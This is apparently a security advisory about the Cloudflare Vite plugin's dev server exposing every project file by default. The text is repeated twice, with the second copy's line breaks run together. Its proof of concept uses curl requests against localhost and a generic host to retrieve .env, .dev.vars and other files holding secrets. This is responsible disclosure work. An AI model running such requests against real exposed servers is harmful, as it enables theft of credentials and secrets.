Summary
Note: originally posted on H1 but closed. Cross-posting over to here in abundance of caution instead of a public issue.
When utilising the Cloudflare Vite plugin in its default configuration, all files are exposed by the local dev server, including files in the root directory that contain secret information such as:
PoC
- Create a Workers project that utilises the
@cloudflare/vite-plugin
. For example:
npm create cloudflare@latest
- select Framework Starter -> React
- Add any secret files to test if they're accessible.
echo foobar=secret > .dev.vars
for example
- Run
npm run dev
to start the dev server (after running npm ci
if necessary to install dependencies) and then hit the following to expose information:
curl http://localhost:5173/.env
may expose any secrets in this file
curl http://localhost:5173/.dev.vars
may expose any secrets in this file
curl http://localhost:5173/package.json
may expose dependencies used by the project, potentially leading to other vulnerabilities
curl http://localhost:5173/README.md
may expose internal documentation
Impact
If the vite dev server is exposed on a public network, such as when a user simply uses wrangler
to serve their application and doesn't publish to Cloudflare in production, an attacker may be able to acquire secrets that the user doesn't wish to be exposed.
Another common scenario where this could happen is when sharing previews of an application using cloudflared
. npm run dev
-> share preview with cloudflared
-> now all secrets are exposed to the public internet.
Exposing via vite is possible via:
npm run dev -- -- --host 0.0.0.0
The default configuration has no reason to expose information outside of the configured assets directory.
Example:
curl http://somehost/.env
may expose secrets
curl http://somehost/.dev.vars
may expose secrets
curl http://somehost/package.json
may expose dependencies used by the project, potentially leading to other vulnerabilities
curl http://somehost/README.md
may expose internal documentation
etc.
Information disclosure to anyone on the same network, or if the dev server is exposed such as via cloudflared
as explored here: #3455 (comment)
Summary
Note: originally posted on H1 but closed. Cross-posting over to here in abundance of caution instead of a public issue.
When utilising the Cloudflare Vite plugin in its default configuration, all files are exposed by the local dev server, including files in the root directory that contain secret information such as:
.env
.dev.vars
PoC
@cloudflare/vite-plugin
. For example:npm create cloudflare@latest
- select Framework Starter -> Reactecho foobar=secret > .dev.vars
for examplenpm run dev
to start the dev server (after runningnpm ci
if necessary to install dependencies) and then hit the following to expose information:curl http://localhost:5173/.env
may expose any secrets in this filecurl http://localhost:5173/.dev.vars
may expose any secrets in this filecurl http://localhost:5173/package.json
may expose dependencies used by the project, potentially leading to other vulnerabilitiescurl http://localhost:5173/README.md
may expose internal documentationImpact
If the vite dev server is exposed on a public network, such as when a user simply uses
wrangler
to serve their application and doesn't publish to Cloudflare in production, an attacker may be able to acquire secrets that the user doesn't wish to be exposed.Another common scenario where this could happen is when sharing previews of an application using
cloudflared
.npm run dev
-> share preview withcloudflared
-> now all secrets are exposed to the public internet.Exposing via vite is possible via:
The default configuration has no reason to expose information outside of the configured assets directory.
Example:
curl http://somehost/.env
may expose secretscurl http://somehost/.dev.vars
may expose secretscurl http://somehost/package.json
may expose dependencies used by the project, potentially leading to other vulnerabilitiescurl http://somehost/README.md
may expose internal documentationetc.
Information disclosure to anyone on the same network, or if the dev server is exposed such as via
cloudflared
as explored here: #3455 (comment)